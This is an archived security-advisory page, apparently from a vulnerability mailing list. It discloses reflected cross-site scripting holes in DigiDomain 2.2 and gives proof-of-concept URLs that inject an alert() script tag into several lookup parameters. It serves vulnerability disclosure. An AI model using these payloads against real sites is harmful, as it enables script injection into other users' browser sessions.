Computer Security

Security Advisory: Multiple XSS in DigiDomain
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  TopperMod 2.0 Remote SQL Injection Vulnerability

From:xx_hack_xx_2004_(at)_hotmail.com <xx_hack_xx_2004_(at)_hotmail.com>
Date:27.03.2008
Subject:Multiple XSS in DigiDomain

Hello
i'm re-posting this message from the actual message which was on Tue-29 May 2007 becuase my old message got live example ,

anyway :
Vulnerable : DigiDomain
Version: 2.2
web : http://www.digiappz.com


XSS :
1-
http://site.com/lookup/lookup_result.asp?domain=[XSS]&tld=.com

2-
http://www.site.com/lookup/suggest_result.asp?domain=.com&tld=&user=&
selecte=1&word1=[XSS]&word2=[XSS]

Example :
1-
http://site.com/lookup/lookup_result.asp?domain='><script>alert(
1);</script>&tld=.com

2-
http://www.site.com/lookup/suggest_result.asp?domain=.com&tld=&user=&
selecte=1&word1='><script>alert(1);</script>&w
ord2='><script>alert(1);</script>


Discovered  By Linux_Drox

LeZr.Com

Best Regards ,,,
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 


Рейтинг@Mail.ru